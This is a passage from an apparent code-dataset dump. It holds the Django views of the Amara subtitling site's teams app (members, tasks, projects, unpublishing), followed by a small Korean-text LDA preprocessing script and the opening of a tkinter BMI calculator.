reverse('teams:user_teams'))\n wants_delete = request.POST.get('del-opt') == 'total-destruction'\n\n if wants_delete:\n if not can_delete_video(team_video, request.user):\n return _error_resp(request, next,\n 
_(u\"You can't delete that video.\"))\n else:\n if not can_remove_video(team_video, request.user):\n return _error_resp(request, next,\n _(u\"You can't remove that video.\"))\n\n for task in team_video.task_set.all():\n task.delete()\n\n video = team_video.video\n\n team_video.delete()\n\n if wants_delete:\n video.delete()\n msg = _(u'Video has been deleted from Amara.')\n else:\n msg = _(u'Video has been removed from the team.')\n\n if request.is_ajax():\n return { 'success': True }\n else:\n messages.success(request, msg)\n return HttpResponseRedirect(next)\n\n\n# Members\n@render_to('teams/members-list.html')\ndef detail_members(request, slug, role=None):\n q = request.REQUEST.get('q')\n lang = request.GET.get('lang')\n filtered = False\n\n team = Team.get(slug, request.user)\n qs = team.members.select_related('user').filter(user__is_active=True)\n\n if q:\n filtered = True\n for term in filter(None, [term.strip() for term in q.split()]):\n qs = qs.filter(Q(user__first_name__icontains=term)\n | Q(user__last_name__icontains=term)\n | Q(user__email__icontains=term)\n | Q(user__username__icontains=term)\n | Q(user__biography__icontains=term))\n\n if lang:\n filtered = True\n qs = qs.filter(user__userlanguage__language=lang)\n\n if role:\n filtered = True\n if role == 'admin':\n qs = qs.filter(role__in=[TeamMember.ROLE_OWNER, TeamMember.ROLE_ADMIN])\n else:\n qs = qs.filter(role=role)\n\n extra_context = widget.add_onsite_js_files({})\n extra_context['filtered'] = filtered\n\n team_member_list, pagination_info = paginate(qs, MEMBERS_ON_PAGE, request.GET.get('page'))\n extra_context.update(pagination_info)\n extra_context['team_member_list'] = team_member_list\n\n # if we are a member that can also edit roles, we create a dict of\n # roles that we can assign, this will vary from user to user, since\n # let's say an admin can change roles, but not for anyone above him\n # the owner, for example\n assignable_roles = []\n if roles_user_can_assign(team, request.user):\n for member in team_member_list:\n if can_assign_role(team, request.user, member.role, member.user):\n assignable_roles.append(member)\n\n users = team.members.values_list('user', flat=True)\n user_langs = set(UserLanguage.objects.filter(user__in=users).values_list('language', flat=True))\n\n extra_context.update({\n 'team': team,\n 'query': q,\n 'role': role,\n 'assignable_roles': assignable_roles,\n 'languages': sorted(languages_with_labels(user_langs).items(), key=lambda pair: pair[1]),\n })\n\n if team.video:\n extra_context['widget_params'] = base_widget_params(request, {\n 'video_url': team.video.get_video_url(),\n 'base_state': {}\n })\n\n return extra_context\n\n@login_required\ndef remove_member(request, slug, user_pk):\n team = Team.get(slug, request.user)\n\n member = get_object_or_404(TeamMember, team=team, user__pk=user_pk)\n\n return_path = reverse('teams:detail_members', args=[], kwargs={'slug': slug})\n\n if can_assign_role(team, request.user, member.role, member.user):\n user = member.user\n if not user == request.user:\n TeamMember.objects.filter(team=team, user=user).delete()\n messages.success(request, _(u'Member has been removed from the team.'))\n return HttpResponseRedirect(return_path)\n else:\n messages.error(request, _(u'Use the \"Leave this team\" button to remove yourself from this team.'))\n return HttpResponseRedirect(return_path)\n else:\n messages.error(request, _(u'You don\\'t have permission to remove this member from the team.'))\n return HttpResponseRedirect(return_path)\n\n@login_required\ndef 
applications(request, slug):\n team = Team.get(slug, request.user)\n\n if not team.is_member(request.user):\n return HttpResponseForbidden(\"Not allowed\")\n\n qs = team.applications.all()\n\n extra_context = {\n 'team': team\n }\n return object_list(request, queryset=qs,\n paginate_by=APLICATIONS_ON_PAGE,\n template_name='teams/applications.html',\n template_object_name='applications',\n extra_context=extra_context)\n\n@login_required\ndef approve_application(request, slug, user_pk):\n team = Team.get(slug, request.user)\n\n if not team.is_member(request.user):\n raise Http404\n\n if can_invite(team, request.user):\n try:\n Application.objects.get(team=team, user=user_pk).approve()\n messages.success(request, _(u'Application approved.'))\n except Application.DoesNotExist:\n messages.error(request, _(u'Application does not exist.'))\n else:\n messages.error(request, _(u'You can\\'t approve applications.'))\n\n return redirect('teams:applications', team.pk)\n\n@login_required\ndef deny_application(request, slug, user_pk):\n team = Team.get(slug, request.user)\n\n if not team.is_member(request.user):\n raise Http404\n\n if can_invite(team, request.user):\n try:\n Application.objects.get(team=team, user=user_pk).deny()\n messages.success(request, _(u'Application denied.'))\n except Application.DoesNotExist:\n messages.error(request, _(u'Application does not exist.'))\n else:\n messages.error(request, _(u'You can\\'t deny applications.'))\n\n return redirect('teams:applications', team.pk)\n\n@render_to('teams/invite_members.html')\n@login_required\ndef invite_members(request, slug):\n team = Team.get(slug, request.user)\n\n if not can_invite(team, request.user):\n return HttpResponseForbidden(_(u'You cannot invite people to this team.'))\n if request.POST:\n form = InviteForm(team, request.user, request.POST)\n if form.is_valid():\n # the form will fire the notifications for invitees\n # this cannot be done on model signal, since you might be\n # sending invites twice for the same user, and that borks\n # the naive signal for only created invitations\n form.save()\n return HttpResponseRedirect(reverse('teams:detail_members',\n args=[], kwargs={'slug': team.slug}))\n else:\n form = InviteForm(team, request.user)\n\n return {\n 'team': team,\n 'form': form,\n }\n\n@login_required\ndef accept_invite(request, invite_pk, accept=True):\n invite = get_object_or_404(Invite, pk=invite_pk, user=request.user)\n\n if accept:\n invite.accept()\n else:\n invite.deny()\n\n return redirect(request.META.get('HTTP_REFERER', '/'))\n\n@login_required\ndef join_team(request, slug):\n team = get_object_or_404(Team, slug=slug)\n user = request.user\n\n if not can_join_team(team, user):\n messages.error(request, _(u'You cannot join this team.'))\n else:\n member = TeamMember(team=team, user=user, role=TeamMember.ROLE_CONTRIBUTOR)\n member.save()\n messages.success(request, _(u'You are now a member of this team.'))\n notifier.team_member_new.delay(member.pk)\n return redirect(team)\n\ndef _check_can_leave(team, user):\n \"\"\"Return an error message if the member cannot leave the team, otherwise None.\"\"\"\n\n try:\n member = TeamMember.objects.get(team=team, user=user)\n except TeamMember.DoesNotExist:\n return u'You are not a member of this team.'\n\n if not team.members.exclude(pk=member.pk).exists():\n return u'You are the last member of this team.'\n\n is_last_owner = (\n member.role == TeamMember.ROLE_OWNER\n and not team.members.filter(role=TeamMember.ROLE_OWNER).exclude(pk=member.pk).exists()\n )\n if 
is_last_owner:\n return u'You are the last owner of this team.'\n\n is_last_admin = (\n member.role == TeamMember.ROLE_ADMIN\n and not team.members.filter(role=TeamMember.ROLE_ADMIN).exclude(pk=member.pk).exists()\n and not team.members.filter(role=TeamMember.ROLE_OWNER).exists()\n )\n if is_last_admin:\n return u'You are the last admin of this team.'\n\n return None\n\n@login_required\ndef leave_team(request, slug):\n team = get_object_or_404(Team, slug=slug)\n user = request.user\n\n error = _check_can_leave(team, user)\n if error:\n messages.error(request, _(error))\n else:\n member = TeamMember.objects.get(team=team, user=user)\n tm_user_pk = member.user.pk\n team_pk = member.team.pk\n member.delete()\n notifier.team_member_leave(team_pk, tm_user_pk)\n\n messages.success(request, _(u'You have left this team.'))\n\n return redirect(request.META.get('HTTP_REFERER') or team)\n\n@permission_required('teams.change_team')\ndef highlight(request, slug, highlight=True):\n item = get_object_or_404(Team, slug=slug)\n item.highlight = highlight\n item.save()\n return redirect(request.META.get('HTTP_REFERER', '/'))\n\ndef _member_search_result(member, team, task_id, team_video_id, task_type, task_lang):\n result = [member.user.id, u'%s (%s)' % (member.user, member.user.username)]\n\n if task_id:\n task = Task.objects.not_deleted().get(team=team, pk=task_id)\n if member.has_max_tasks():\n result += [False]\n else:\n result += [can_perform_task(member.user, task)]\n elif team_video_id:\n team_video = TeamVideo.objects.get(pk=team_video_id)\n if member.has_max_tasks():\n result += [False]\n else:\n result += [can_perform_task_for(member.user, task_type, team_video, task_lang)]\n else:\n result += [None]\n\n return result\n\n@render_to_json\ndef search_members(request, slug):\n team = Team.get(slug, request.user)\n q = request.GET.get('term', '').replace('(', '').replace(')', '')\n terms = get_terms(q)\n\n task_id = request.GET.get('task')\n task_type = request.GET.get('task_type')\n task_lang = request.GET.get('task_lang')\n team_video_id = request.GET.get('team_video')\n\n members = team.members.filter(user__is_active=True)\n for term in terms:\n members = members.filter(\n Q(user__username__icontains=term) |\n Q(user__first_name__icontains=term) |\n Q(user__last_name__icontains=term)\n )\n members = members.select_related('user')[:MAX_MEMBER_SEARCH_RESULTS]\n\n results = [_member_search_result(m, team, task_id, team_video_id, task_type, task_lang)\n for m in members]\n\n return { 'results': results }\n\n\n# Tasks\ndef _get_or_create_workflow(team_slug, project_id, team_video_id):\n try:\n workflow = Workflow.objects.get(team__slug=team_slug, project=project_id,\n team_video=team_video_id)\n except Workflow.DoesNotExist:\n # We special case this because Django won't let us create new models\n # with the IDs, we need to actually pass in the Model objects for\n # the ForeignKey fields.\n #\n # Most of the time we won't need to do these three extra queries.\n\n team = Team.objects.get(slug=team_slug)\n project = Project.objects.get(pk=project_id) if project_id else None\n team_video = TeamVideo.objects.get(pk=team_video_id) if team_video_id else None\n\n workflow = Workflow(team=team, project=project, team_video=team_video)\n\n return workflow\n\ndef _task_languages(team, user):\n languages = filter(None, Task.objects.filter(team=team, deleted=False)\n .values_list('language', flat=True)\n .distinct())\n\n language_labels = dict(get_language_choices(with_empty=True))\n\n # TODO: Handle the team 
language setting here once team settings are\n # implemented.\n languages = list(set(languages))\n lang_data = []\n for l in languages:\n if language_labels.get(l):\n lang_data.append({'code': l, 'name': language_labels[l]} )\n else:\n logger.error(\"Failed to find language code for task\", extra={\n \"data\": {\n \"language_code\": l,\n \"supported\": language_labels\n }\n })\n return lang_data\n\ndef _task_category_counts(team, filters, user):\n tasks = team.task_set.incomplete()\n\n if filters['language']:\n tasks = tasks.filter(language=filters['language'])\n\n if filters['team_video']:\n tasks = tasks.filter(team_video=int(filters['team_video']))\n\n if filters['assignee']:\n if filters['assignee'] == 'none':\n tasks = tasks.filter(assignee=None)\n else:\n tasks = tasks.filter(assignee=user)\n\n counts = { 'all': tasks.count() }\n\n for type in ['Subtitle', 'Translate', 'Review', 'Approve']:\n counts[type.lower()] = tasks.filter(type=Task.TYPE_IDS[type]).count()\n\n return counts\n\ndef _tasks_list(request, team, project, filters, user):\n '''List tasks for the given team, optionally filtered.\n\n `filters` should be an object/dict with zero or more of the following keys:\n\n * type: a string describing the type of task. 'Subtitle', 'Translate', etc.\n * completed: true or false\n * assignee: user ID as an integer\n * team_video: team video ID as an integer\n\n '''\n tasks = Task.objects.filter(team=team.id, deleted=False)\n\n if project:\n tasks = tasks.filter(team_video__project = project)\n\n if filters.get('team_video'):\n tasks = tasks.filter(team_video=filters['team_video'])\n\n if filters.get('completed'):\n tasks = tasks.filter(completed__isnull=False)\n else:\n tasks = tasks.filter(completed=None)\n\n if filters.get('language'):\n if filters.get('language') == 'mine' and request.user.is_authenticated():\n tasks = tasks.filter(language__in=[ul.language for ul in request.user.get_languages()])\n else:\n tasks = tasks.filter(language=filters['language'])\n\n if filters.get('q'):\n terms = get_terms(filters['q'])\n for term in terms:\n tasks = tasks.filter(\n Q(team_video__video__title__icontains=term)\n | Q(team_video__title__icontains=term)\n )\n\n if filters.get('type'):\n tasks = tasks.filter(type=Task.TYPE_IDS[filters['type']])\n\n if filters.get('assignee'):\n assignee = filters.get('assignee')\n\n if assignee == 'me':\n tasks = tasks.filter(assignee=user)\n elif assignee == 'none':\n tasks = tasks.filter(assignee=None)\n elif assignee and assignee.isdigit():\n tasks = tasks.filter(assignee=int(assignee))\n elif assignee:\n tasks = tasks.filter(assignee=User.objects.get(username=assignee))\n\n return tasks.select_related('team_video__video', 'team_video__team', 'assignee', 'team', 'team_video__project')\n\ndef _order_tasks(request, tasks):\n sort = request.GET.get('sort', '-created')\n\n if sort == 'created':\n tasks = tasks.order_by('created')\n elif sort == '-created':\n tasks = tasks.order_by('-created')\n elif sort == 'expires':\n tasks = tasks.exclude(expiration_date=None).order_by('expiration_date')\n elif sort == '-expires':\n tasks = tasks.exclude(expiration_date=None).order_by('-expiration_date')\n\n return tasks\n\ndef _get_task_filters(request):\n return { 'language': request.GET.get('lang'),\n 'type': request.GET.get('type'),\n 'team_video': request.GET.get('team_video'),\n 'assignee': request.GET.get('assignee'),\n 'q': request.GET.get('q'), }\n\n@render_to('teams/tasks.html')\ndef team_tasks(request, slug, project_slug=None):\n team = Team.get(slug, 
request.user)\n\n    if not can_view_tasks_tab(team, request.user):\n        messages.error(request, _(\"You cannot view this team's tasks.\"))\n        return HttpResponseRedirect(team.get_absolute_url())\n\n    # TODO: Review this\n    if project_slug is not None:\n        project = get_object_or_404(Project, team=team, slug=project_slug)\n    else:\n        project = None\n\n    user = request.user if request.user.is_authenticated() else None\n    member = team.members.get(user=user) if user else None\n    languages = _task_languages(team, request.user)\n    languages = sorted(languages, key=lambda l: l['name'])\n    filters = _get_task_filters(request)\n    filtered = 0\n\n    tasks = _order_tasks(request,\n                         _tasks_list(request, team, project, filters, user))\n    category_counts = _task_category_counts(team, filters, request.user)\n    tasks, pagination_info = paginate(tasks, TASKS_ON_PAGE, request.GET.get('page'))\n\n    if filters.get('team_video'):\n        filters['team_video'] = TeamVideo.objects.get(pk=filters['team_video'])\n\n    if filters.get('assignee'):\n        if filters['assignee'] == 'me':\n            filters['assignee'] = team.members.get(user=request.user)\n        elif filters['assignee'] == 'none':\n            filters['assignee'] = None\n        elif filters['assignee'].isdigit():\n            filters['assignee'] = team.members.get(user=filters['assignee'])\n        else:\n            filters['assignee'] = team.members.get(user=User.objects.get(username=filters['assignee']))\n\n        filtered = filtered + 1\n\n    if filters.get('language'):\n        filtered = filtered + 1\n\n    if filters.get('type'):\n        filtered = filtered + 1\n\n    widget_settings = {}\n    from apps.widget.rpc import add_general_settings\n    add_general_settings(request, widget_settings)\n\n    video_pks = [t.team_video.video_id for t in tasks]\n    video_urls = dict([(vu.video_id, vu.effective_url) for vu in\n                       VideoUrl.objects.filter(video__in=video_pks, primary=True)])\n\n    for t in tasks:\n        t.cached_video_url = video_urls.get(t.team_video.video_id)\n\n    context = {\n        'team': team,\n        'project': project, # TODO: Review\n        'user_can_delete_tasks': can_delete_tasks(team, request.user),\n        'user_can_assign_tasks': can_assign_tasks(team, request.user),\n        'assign_form': TaskAssignForm(team, member),\n        'languages': languages,\n        'category_counts': category_counts,\n        'tasks': tasks,\n        'filters': filters,\n        'widget_settings': widget_settings,\n        'filtered': filtered,\n        'member': member,\n        'upload_draft_form': UploadDraftForm()\n    }\n\n    context.update(pagination_info)\n\n    return context\n\n@render_to('teams/create_task.html')\ndef create_task(request, slug, team_video_pk):\n    team = get_object_or_404(Team, slug=slug)\n    team_video = get_object_or_404(TeamVideo, pk=team_video_pk, team=team)\n    can_assign = can_assign_tasks(team, request.user, team_video.project)\n\n    if request.POST:\n        form = TaskCreateForm(request.user, team, team_video, request.POST)\n\n        if form.is_valid():\n            task = form.save(commit=False)\n\n            task.team = team\n            task.team_video = team_video\n\n            task.set_expiration()\n\n            if task.type == Task.TYPE_IDS['Subtitle']:\n                task.language = ''\n\n            if task.type in [Task.TYPE_IDS['Review'], Task.TYPE_IDS['Approve']]:\n                task.approved = Task.APPROVED_IDS['In Progress']\n                task.subtitle_version = task.team_video.video.latest_version(language_code=task.language)\n\n            task.save()\n            notifier.team_task_assigned.delay(task.pk)\n            return HttpResponseRedirect(reverse('teams:team_tasks', args=[],\n                                                kwargs={'slug': team.slug}))\n    else:\n        form = TaskCreateForm(request.user, team, team_video)\n\n    subtitlable = json.dumps(can_create_task_subtitle(team_video, request.user))\n    translatable_languages = 
json.dumps(can_create_task_translate(team_video, request.user))\n\n language_choices = json.dumps(get_language_choices(True))\n\n return { 'form': form, 'team': team, 'team_video': team_video,\n 'translatable_languages': translatable_languages,\n 'language_choices': language_choices,\n 'subtitlable': subtitlable,\n 'can_assign': can_assign, }\n\n@login_required\ndef perform_task(request, slug=None, task_pk=None):\n task_pk = task_pk or request.POST.get('task_id')\n task = Task.objects.get(pk=task_pk)\n if slug:\n team = get_object_or_404(Team,slug=slug)\n if task.team != team:\n return HttpResponseForbidden(_(u'You are not allowed to perform this task.'))\n\n if not can_perform_task(request.user, task):\n return HttpResponseForbidden(_(u'You are not allowed to perform this task.'))\n\n task.assignee = request.user\n task.save()\n\n # ... perform task ...\n return HttpResponseRedirect(task.get_perform_url())\n\ndef _delete_subtitle_version(version):\n sl = version.language\n n = version.version_no\n\n # Delete this specific version...\n version.delete()\n\n # We also want to delete all draft subs leading up to this version.\n for v in sl.subtitleversion_set.filter(version_no__lt=n).order_by('-version_no'):\n if v.is_public:\n break\n v.delete()\n\n # And if we've deleted everything in the language, we can delete the language as well.\n if not sl.subtitleversion_set.exists():\n sl.delete()\n\ndef delete_task(request, slug):\n '''Mark a task as deleted.\n\n The task will not be physically deleted from the database, but will be\n flagged and won't appear in further task listings.\n\n '''\n team = get_object_or_404(Team, slug=slug)\n next = request.POST.get('next', reverse('teams:team_tasks', args=[], kwargs={'slug': slug}))\n\n form = TaskDeleteForm(team, request.user, data=request.POST)\n if form.is_valid():\n task = form.cleaned_data['task']\n video = task.team_video.video\n task.deleted = True\n\n if task.subtitle_version:\n if form.cleaned_data['discard_subs']:\n _delete_subtitle_version(task.subtitle_version)\n task.subtitle_version = None\n\n if task.get_type_display() in ['Review', 'Approve']:\n # TODO: Handle subtitle/translate tasks here too?\n if not form.cleaned_data['discard_subs'] and task.subtitle_version:\n task.subtitle_version.moderation_status = MODERATION.APPROVED\n task.subtitle_version.save()\n metadata_manager.update_metadata(video.pk)\n\n task.save()\n\n messages.success(request, _('Task deleted.'))\n else:\n messages.error(request, _('You cannot delete this task.'))\n\n return HttpResponseRedirect(next)\n\ndef assign_task(request, slug):\n '''Assign a task to the given user, or unassign it if null/None.'''\n team = get_object_or_404(Team, slug=slug)\n next = request.POST.get('next', reverse('teams:team_tasks', args=[], kwargs={'slug': slug}))\n\n form = TaskAssignForm(team, request.user, data=request.POST)\n if form.is_valid():\n task = form.cleaned_data['task']\n assignee = form.cleaned_data['assignee']\n\n if task.assignee == request.user:\n was_mine = True\n else:\n was_mine = False\n\n task.assignee = assignee\n task.set_expiration()\n task.save()\n notifier.team_task_assigned.delay(task.pk)\n\n if task.assignee is None and was_mine:\n messages.success(request, _('Task declined.'))\n else:\n messages.success(request, _('Task assigned.'))\n else:\n messages.error(request, _('You cannot assign this task.'))\n\n return HttpResponseRedirect(next)\n\n@render_to_json\n@login_required\ndef assign_task_ajax(request, slug):\n '''Assign a task to the given user, or unassign 
it if null/None.'''\n    team = get_object_or_404(Team, slug=slug)\n\n    form = TaskAssignForm(team, request.user, data=request.POST)\n    if form.is_valid():\n        task = form.cleaned_data['task']\n        assignee = form.cleaned_data['assignee']\n\n        task.assignee = assignee\n        task.set_expiration()\n        task.save()\n        notifier.team_task_assigned.delay(task.pk)\n\n        return { 'success': True }\n    else:\n        return HttpResponseForbidden(_(u'Invalid assignment attempt.'))\n\ndef upload_draft(request, slug):\n\n    if request.POST:\n        form = UploadDraftForm(request.POST)\n\n        if form.is_valid():\n\n            team = get_object_or_404(Team, slug=slug)\n            task = form.cleaned_data['task']\n            draft = form.cleaned_data['draft']\n\n            # Parse the file, etc.\n\n            messages.success(request, _(u\"Draft uploaded successfully.\"))\n        else:\n            messages.error(request, _(u\"There was a problem uploading that draft.\"))\n\n        return HttpResponseRedirect(reverse('teams:team_tasks', args=[], kwargs={'slug': slug}))\n    else:\n        return HttpResponseBadRequest()\n\n# Projects\ndef project_list(request, slug):\n    team = get_object_or_404(Team, slug=slug)\n    projects = Project.objects.for_team(team)\n    return render_to_response(\"teams/project_list.html\", {\n        \"team\":team,\n        \"projects\": projects\n    }, RequestContext(request))\n\n@render_to('teams/settings-projects-add.html')\n@login_required\ndef add_project(request, slug):\n    team = Team.get(slug, request.user)\n\n    if request.POST:\n        form = ProjectForm(request.POST)\n        workflow_form = WorkflowForm(request.POST)\n\n        if form.is_valid() and workflow_form.is_valid():\n\n            if team.project_set.filter(slug=pan_slugify(form.cleaned_data['name'])).exists():\n                messages.error(request, _(u\"There's already a project with this name\"))\n            else:\n                project = form.save(commit=False)\n                project.team = team\n                project.save()\n\n                if project.workflow_enabled:\n                    workflow = workflow_form.save(commit=False)\n                    workflow.team = team\n                    workflow.project = project\n                    workflow.save()\n\n                messages.success(request, _(u'Project added.'))\n                return HttpResponseRedirect(\n                    reverse('teams:settings_projects', args=[], kwargs={'slug': slug}))\n    else:\n        form = ProjectForm()\n        workflow_form = WorkflowForm()\n\n    return { 'team': team, 'form': form, 'workflow_form': workflow_form, }\n\n@render_to('teams/settings-projects-edit.html')\n@login_required\ndef edit_project(request, slug, project_slug):\n    team = Team.get(slug, request.user)\n    project = Project.objects.get(slug=project_slug, team=team)\n    project_list_url = reverse('teams:settings_projects', args=[], kwargs={'slug': slug})\n\n    if project.is_default_project:\n        messages.error(request, _(u'You cannot edit that project.'))\n        return HttpResponseRedirect(project_list_url)\n\n    try:\n        workflow = Workflow.objects.get(team=team, project=project)\n    except Workflow.DoesNotExist:\n        workflow = None\n\n    if request.POST:\n        if request.POST.get('delete', None) == 'Delete':\n            project.delete()\n            messages.success(request, _(u'Project deleted.'))\n            return HttpResponseRedirect(project_list_url)\n        else:\n            form = ProjectForm(request.POST, instance=project)\n            workflow_form = WorkflowForm(request.POST, instance=workflow)\n\n            # if the project doesn't have workflow enabled, the workflow form\n            # is going to fail to validate (workflow is None), so only require\n            # it to validate when workflows are actually in use\n            if form.is_valid() and (workflow_form.is_valid() if project.workflow_enabled else True):\n                form.save()\n\n                if project.workflow_enabled:\n                    workflow = workflow_form.save(commit=False)\n                    workflow.team = team\n                    workflow.project = project\n                    
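# the Workflow row is scoped to this exact team/project pair, so both\n                    # foreign keys have to be reattached before saving\n                    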
workflow.save()\n\n messages.success(request, _(u'Project saved.'))\n return HttpResponseRedirect(project_list_url)\n\n else:\n form = ProjectForm(instance=project)\n workflow_form = WorkflowForm(instance=workflow)\n\n return { 'team': team, 'project': project, 'form': form, 'workflow_form': workflow_form, }\n\n@render_to('teams/_third-party-accounts.html')\n@login_required\ndef third_party_accounts(request, slug):\n from accountlinker.views import _generate_youtube_oauth_request_link\n team = get_object_or_404(Team, slug=slug)\n if not can_change_team_settings(team, request.user):\n messages.error(request, _(u'You do not have permission to edit this team.'))\n return HttpResponseRedirect(team.get_absolute_url())\n\n new_youtube_url = _generate_youtube_oauth_request_link(str(team.pk))\n linked_accounts = team.third_party_accounts.all()\n return {\n \"team\":team,\n \"new_youtube_url\": new_youtube_url,\n \"linked_accounts\": linked_accounts,\n }\n\n\n# Unpublishing\ndef _create_task_after_unpublishing(subtitle_version):\n team_video = subtitle_version.language.video.get_team_video()\n lang = subtitle_version.language.language\n\n # If there's already an open task for this language we don't need another.\n open_task_exists = team_video.task_set.incomplete().filter(language=lang).exists()\n\n if open_task_exists:\n return None\n\n workflow = Workflow.get_for_team_video(team_video)\n if workflow.approve_allowed:\n type = Task.TYPE_IDS['Approve']\n can_do = can_approve\n else:\n type = Task.TYPE_IDS['Review']\n can_do = can_review\n\n # Try to guess the appropriate assignee by looking at the last task.\n last_task = (team_video.task_set.complete().filter(language=lang, type=type)\n .order_by('-completed')\n [:1])\n assignee = None\n if last_task:\n candidate = last_task[0].assignee\n if candidate and can_do(team_video, candidate, lang):\n assignee = candidate\n\n task = Task(team=team_video.team, team_video=team_video,\n assignee=assignee, language=lang, type=type,\n subtitle_version=subtitle_version)\n task.set_expiration()\n task.save()\n\n return task\n\ndef _propagate_unpublish_to_external_services(language_pk, language_code, video):\n \"\"\"Push the 'unpublishing' of subs to third-party providers for the given language.\n\n The unpublishing must be fully complete before this function is called.\n\n \"\"\"\n try:\n language = SubtitleLanguage.objects.get(pk=language_pk)\n except SubtitleLanguage.DoesNotExist:\n delete_captions_in_original_service_by_code.delay(language_code, video.pk)\n return\n\n # Find the latest public version to determine what kind of third-party call\n # we need to make.\n latest_version = language.latest_version(public_only=True)\n\n if latest_version:\n # There's a latest version that's still public, so third-party services\n # should use that one.\n upload_subtitles_to_original_service.delay(latest_version.pk)\n else:\n # There's no latest version that's still public, but we know the\n # language still exists.\n #\n # This means that all of the subs in the language have been unpublished\n # and are awaiting moderation.\n #\n # In this case we should delete the subs from the external service\n # entirely, since we know that all the subs we have are bad.\n delete_captions_in_original_service.delay(language_pk)\n\ndef _propagate_unpublish_to_tasks(team_video, language_pk, language_code):\n \"\"\"Push the 'unpublishing' of a language to any tasks applying to it.\n\n The unpublishing must be fully complete before this function is called.\n\n \"\"\"\n try:\n language = 
SubtitleLanguage.objects.get(pk=language_pk)\n if language and language.latest_version(public_only=False):\n # Don't kill any tasks if there are still versions remaining.\n return\n except SubtitleLanguage.DoesNotExist:\n pass\n\n tasks_to_delete = team_video.task_set.not_deleted()\n\n # If there is still no original language left, we can just delete all the\n # tasks for this video because someone deleted everything.\n #\n # If there *is* an original language left, we just delete tasks for the\n # languages that were unpublished.\n if team_video.video.subtitle_language():\n tasks_to_delete = tasks_to_delete.filter(language=language_code)\n\n tasks_to_delete.update(deleted=True)\n\ndef unpublish(request, slug):\n team = get_object_or_404(Team, slug=slug)\n\n form = UnpublishForm(request.user, team, request.POST)\n if not form.is_valid():\n messages.error(request, _(u'Invalid unpublishing request.\\nErrors:\\n') + '\\n'.join(flatten_errorlists(form.errors)))\n return HttpResponseRedirect(request.POST.get('next', team.get_absolute_url()))\n\n version = form.cleaned_data['subtitle_version']\n team_video = version.language.video.get_team_video()\n video = version.language.video\n scope = form.cleaned_data['scope']\n should_delete = form.cleaned_data['should_delete']\n language = version.language\n\n results = []\n if scope == 'version':\n results.append([version.language.pk, version.language.language,\n version.unpublish(delete=should_delete)])\n elif scope == 'dependents':\n translations = list(SubtitleLanguage.objects.filter(video=language.video,\n standard_language=language,\n is_forked=False))\n for l in [language] + translations:\n results.append([l.pk, l.language,\n l.unpublish(delete=should_delete)])\n else:\n assert False, 'Invalid scope.'\n\n for language_pk, language_code, version_for_task in results:\n _propagate_unpublish_to_external_services(language_pk, language_code, video)\n _propagate_unpublish_to_tasks(team_video, language_pk, language_code)\n\n if version_for_task:\n _create_task_after_unpublishing(version_for_task)\n\n metadata_manager.update_metadata(team_video.video.pk)\n update_one_team_video(team_video.pk)\n\n messages.success(request, _(u'Successfully unpublished subtitles.'))\n api_subtitles_rejected.send(version)\n return HttpResponseRedirect(request.POST.get('next', team.get_absolute_url()))\n\n@login_required\ndef auto_captions_status(request, slug):\n \"\"\"\n Prints a simple table of partner status for captions, this should\n should be used internally (as a cvs file with tab delimiters)\n \"\"\"\n buffer = []\n team = get_object_or_404(Team, slug=slug)\n if not team.is_member(request.user):\n return HttpResponseForbidden(\"Not allowed\")\n buffer.append( \"Video\\tproject\\tURL\\tstatus\\tjob_id\\ttask_id\\tcreated on\\tcompleted on\")\n for tv in team.teamvideo_set.all().select_related(\"job\", \"project\", \"video\"):\n jobs = tv.job_set.all()\n extra = \"\"\n if jobs.exists():\n j = jobs[0]\n extra = \"%s\\t%s\\t%s\\t%s\\t%s\" % (j.status, j.job_id, j.task_id, j.created_on, j.completed_on)\n url = \"%s://%s%s\" % (DEFAULT_PROTOCOL, Site.objects.get_current().domain, tv.video.get_absolute_url())\n buffer.append( \"Video:%s\\t %s\\t%s\\t %s\" % (tv.video.title,tv.project.name, url, extra))\n response = HttpResponse( \"\\n\".join(buffer), content_type=\"text/csv\")\n response['Content-Disposition'] = 'filename=team-status.csv'\n return 
response\n","repo_name":"nemgue/unisubs","sub_path":"apps/teams/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":59698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"38"} +{"seq_id":"73319974511","text":"from gensim.corpora import Dictionary, MmCorpus\nfrom konlpy.tag import Okt\nfrom gensim import word2vec\nfrom gensim.models import Phrases\nimport csv\n\ntwitter = Okt()\nresults = []\n\ndata_path = 'posts_data_50.csv'\nparsed_path = 'parsed_bamboo.txt'\nword2vec_path = 'Bambooword2vec.model'\n\n\n# parsing the data to parsed_bamboo.txt\ndef clean_posts(post):\n lines = post[0].split(\"\\n\")\n for line in lines:\n temp_list = twitter.pos(line, norm=True, stem=True)\n r = []\n for word in temp_list:\n if not word[1] in [\"Josa\", \"Eomi\", \"Punctuation\"]:\n r.append(word[0])\n rl = (\" \".join(r)).strip()\n return rl\n\n\nwith open(data_path, 'w') as f:\n data = csv.reader(f, delimiter=',')\n for row in data:\n results.append(clean_posts(row))\n\n\nwith open(parsed_path, 'w', encoding='utf-8') as fp:\n fp.write(\"\\n\".join(results))\n\n# making of the lda phrases analysis\n\n# making of the dictionary for lda topic analysis\ndict_made = False\n\ndict_path = 'dictionary.dict'\n\nif dict_made:\n dictionary = Dictionary.load(dict_path)\nelse:\n reviews_for_lda = word2vec.LineSentence(reviews_for_lda_filepath)\n dictionary = Dictionary(reviews_for_lda)\n dictionary.filter_extremes(no_below=10, no_above=0.4)\n dictionary.compactify()\n\n dictionary.save(dict_path)","repo_name":"haesookim/fbpage-scraping-exercise","sub_path":"lda_alt.py","file_name":"lda_alt.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34877042495","text":"# importing the tkinter module\nfrom tkinter import *\n\n# creating root window\nroot = Tk()\nroot.title(\"Ideal Body Mass Index\")\nroot.geometry(\"900x700\")\nroot.config(bg=\"cyan\")\nheader = Label(root, text='Ideal Body Mass Index Calculator', bg='gold', fg='blue', font=30)\nheader.place(x=250, y=20)\n\n# creating a frame in a root\nframe = Frame(root, width=500, height=200, relief='raised', bg='goldenrod')\nframe.place(x=200, y=50)\n\n# creating labels in a frame\nbmi_weight = Label(frame, text=\"Weight(kg):\", bg='white', fg='green')\nbmi_weight.place(x=50, y=20)\nbmi_weight_entry = Entry(frame)\nbmi_weight_entry.place(x=200, y=20)\n\nbmi_height = Label(frame, text=\"Height(cm):\", bg='white', fg='green')\nbmi_height.place(x=45, y=60)\nbmi_height_entry = 